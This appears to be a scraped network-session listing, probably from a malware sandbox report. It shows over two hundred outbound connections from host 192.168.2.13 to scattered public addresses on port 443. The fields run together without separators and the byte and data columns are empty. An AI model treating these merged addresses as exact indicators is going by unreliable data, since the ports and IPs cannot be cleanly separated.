                                    16781192.168.2.1345924159.101.236.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16782192.168.2.1342410193.229.30.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16783192.168.2.1340540160.62.213.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16784192.168.2.1354176188.40.47.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16785192.168.2.134803892.17.214.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16786192.168.2.1342830132.69.125.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16787192.168.2.135159036.105.221.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16788192.168.2.133448074.166.184.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16789192.168.2.1347418138.130.109.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16790192.168.2.1336378208.123.196.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16791192.168.2.1350934140.18.57.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16792192.168.2.1357012177.26.3.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16793192.168.2.1353052219.41.46.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16794192.168.2.1344450185.105.117.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16795192.168.2.1353840152.126.72.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16796192.168.2.1353972166.173.121.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16797192.168.2.135798086.68.190.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16798192.168.2.1339668190.235.77.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16799192.168.2.1353376164.112.205.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16800192.168.2.1337306199.209.37.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16801192.168.2.1347078192.14.205.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16802192.168.2.1358976178.131.93.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16803192.168.2.135181281.17.251.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16804192.168.2.1341186162.27.207.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16805192.168.2.134316893.11.71.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16806192.168.2.134007843.28.70.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16807192.168.2.133744479.128.246.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16808192.168.2.1333816207.172.55.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16809192.168.2.1333860210.126.46.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16810192.168.2.134305819.162.47.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16811192.168.2.1355420200.231.161.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16812192.168.2.134816681.94.21.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16813192.168.2.1351272216.81.186.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16814192.168.2.133758012.210.64.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16815192.168.2.1351582181.175.117.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16816192.168.2.134674869.14.90.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16817192.168.2.134454062.173.114.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16818192.168.2.1360202210.255.230.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16819192.168.2.1336388184.84.212.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16820192.168.2.13366949.7.133.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16821192.168.2.134952451.75.90.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16822192.168.2.1360806114.242.103.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16823192.168.2.1358428135.61.118.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16824192.168.2.1350974182.18.48.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16825192.168.2.134497446.116.48.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16826192.168.2.134421686.70.255.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16827192.168.2.1337312212.7.127.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16828192.168.2.1352772205.48.197.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16829192.168.2.1354240160.149.114.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16830192.168.2.1340238150.139.75.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16831192.168.2.1333688184.181.180.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16832192.168.2.134654070.139.210.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16833192.168.2.134585035.223.93.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16834192.168.2.13349841.168.138.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16835192.168.2.1360386126.53.46.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16836192.168.2.1337670149.190.233.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16837192.168.2.1347492191.65.188.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16838192.168.2.134915889.63.28.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16839192.168.2.1341272157.108.245.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16840192.168.2.1340070132.77.225.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16841192.168.2.1342960138.24.0.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16842192.168.2.1334550133.249.8.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16843192.168.2.134963663.234.80.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16844192.168.2.133999675.230.218.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16845192.168.2.1335300151.126.44.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16846192.168.2.1354720159.50.8.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16847192.168.2.133560090.129.241.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16848192.168.2.134549418.169.145.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16849192.168.2.1344052200.47.54.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16850192.168.2.1348452201.168.148.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16851192.168.2.1344774179.12.130.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16852192.168.2.13368489.131.12.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16853192.168.2.1358348208.175.175.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16854192.168.2.135716073.22.218.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16855192.168.2.133713084.81.70.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16856192.168.2.135890451.249.51.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16857192.168.2.1350478112.230.107.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16858192.168.2.13474405.41.19.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16859192.168.2.1339734198.218.235.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16860192.168.2.13475348.180.192.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16861192.168.2.1358252104.24.206.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16862192.168.2.1349272124.54.190.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16863192.168.2.1339894198.78.102.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16864192.168.2.135738644.214.138.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16865192.168.2.1348326112.39.103.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16866192.168.2.1353026110.156.211.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16867192.168.2.1360982167.56.186.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16868192.168.2.1353880145.251.43.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16869192.168.2.1343432135.87.15.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16870192.168.2.134111848.232.203.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16871192.168.2.1347504130.163.228.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16872192.168.2.1334468161.49.98.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16873192.168.2.1358262104.136.6.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16874192.168.2.1342356144.100.7.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16875192.168.2.1351116197.245.241.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16876192.168.2.135339827.71.195.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16877192.168.2.133394470.59.162.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16878192.168.2.13491021.40.0.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16879192.168.2.134379275.191.84.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16880192.168.2.1334768148.73.86.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16881192.168.2.13484269.187.40.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16882192.168.2.134976481.72.222.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16883192.168.2.1359856194.191.196.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16884192.168.2.1349308156.125.19.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16885192.168.2.1336008162.76.137.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16886192.168.2.134706019.107.104.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16887192.168.2.1334462221.89.176.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16888192.168.2.1344284187.173.163.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16889192.168.2.134052220.89.218.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16890192.168.2.1345774112.89.164.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16891192.168.2.1339826160.92.220.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16892192.168.2.1341492101.241.70.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16893192.168.2.135933265.218.11.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16894192.168.2.135236632.91.129.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16895192.168.2.1351780132.245.95.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16896192.168.2.1340802118.188.158.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16897192.168.2.135587213.81.80.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16898192.168.2.135607466.42.72.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16899192.168.2.1335726195.77.44.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16900192.168.2.1344634162.108.126.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16901192.168.2.135602625.156.93.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16902192.168.2.1358186208.44.9.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16903192.168.2.1352676198.194.46.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16904192.168.2.1351944195.110.240.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16905192.168.2.133399290.124.75.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16906192.168.2.1336170185.26.119.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16907192.168.2.1332938137.182.132.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16908192.168.2.1360230220.187.175.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16909192.168.2.135881452.108.8.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16910192.168.2.134595023.30.12.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16911192.168.2.134075076.209.11.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16912192.168.2.134940435.194.254.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16913192.168.2.134085269.181.128.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16914192.168.2.133316418.87.198.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16915192.168.2.1337442221.16.214.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16916192.168.2.1344448181.2.199.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16917192.168.2.1354946217.173.250.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16918192.168.2.134374662.92.235.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16919192.168.2.135481047.39.29.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16920192.168.2.133723261.91.180.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16921192.168.2.135255096.77.154.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16922192.168.2.134571023.223.197.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16923192.168.2.1346466138.89.173.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16924192.168.2.135081248.157.174.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16925192.168.2.1340480211.186.145.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16926192.168.2.133699231.34.149.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16927192.168.2.135150669.64.57.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16928192.168.2.1348880200.88.211.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16929192.168.2.133901298.63.236.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16930192.168.2.1342400103.210.138.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16931192.168.2.134771297.94.104.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16932192.168.2.1335042191.194.166.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16933192.168.2.1347836161.57.91.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16934192.168.2.135351888.97.24.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16935192.168.2.1335390181.123.183.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16936192.168.2.1359770115.211.25.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16937192.168.2.1345310142.167.22.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16938192.168.2.133609666.196.150.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16939192.168.2.1353594180.177.51.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16940192.168.2.13339968.224.67.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16941192.168.2.1337852171.31.159.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16942192.168.2.135284078.155.57.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16943192.168.2.134344235.81.230.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16944192.168.2.135514277.129.64.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16945192.168.2.1348802202.234.171.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16946192.168.2.134505648.93.255.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16947192.168.2.134611442.227.42.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16948192.168.2.1344454130.34.8.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16949192.168.2.133689067.74.202.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16950192.168.2.1360100100.142.69.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16951192.168.2.133499497.241.215.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16952192.168.2.1359424109.249.129.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16953192.168.2.135712218.190.141.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16954192.168.2.1334872140.251.27.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16955192.168.2.1337688209.223.222.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16956192.168.2.1354014136.252.185.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16957192.168.2.1350834152.84.133.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16958192.168.2.1338564111.176.203.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16959192.168.2.1354140109.116.204.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16960192.168.2.135471284.58.42.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16961192.168.2.1359368122.27.246.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16962192.168.2.1350962169.56.91.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16963192.168.2.134264636.158.33.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16964192.168.2.1340180217.204.245.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16965192.168.2.1348410194.166.64.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16966192.168.2.1345880217.206.156.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16967192.168.2.135947413.131.148.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16968192.168.2.1344534194.45.146.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16969192.168.2.134366675.79.76.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16970192.168.2.1359182163.150.122.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16971192.168.2.134859683.147.19.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16972192.168.2.135656058.149.178.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16973192.168.2.135426674.105.212.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16974192.168.2.1353760165.141.175.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16975192.168.2.135652684.21.84.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16976192.168.2.1358678166.25.192.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16977192.168.2.1360778116.37.228.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16978192.168.2.1359530188.36.83.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16979192.168.2.133808291.184.76.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16980192.168.2.1342006137.132.243.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16981192.168.2.1359294178.144.28.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16982192.168.2.1338724220.51.117.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16983192.168.2.1337856149.10.172.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16984192.168.2.1340266140.140.126.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16985192.168.2.135004298.135.86.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16986192.168.2.1334350107.123.71.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16987192.168.2.1352826203.114.152.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16988192.168.2.1333178145.65.199.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16989192.168.2.1343072149.54.224.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16990192.168.2.1340074146.136.143.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16991192.168.2.1344042206.74.62.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16992192.168.2.1354592209.125.39.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16993192.168.2.1357666209.98.3.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16994192.168.2.1344572196.240.156.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16995192.168.2.1340972157.175.181.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16996192.168.2.13600624.148.236.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16997192.168.2.135503220.239.1.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16998192.168.2.13462248.53.119.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16999192.168.2.1334716202.98.232.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17000192.168.2.1353730210.73.183.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17001192.168.2.1337730211.194.250.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    17002192.168.2.134673644.147.170.11443
                                    TimestampBytes transferredDirectionData


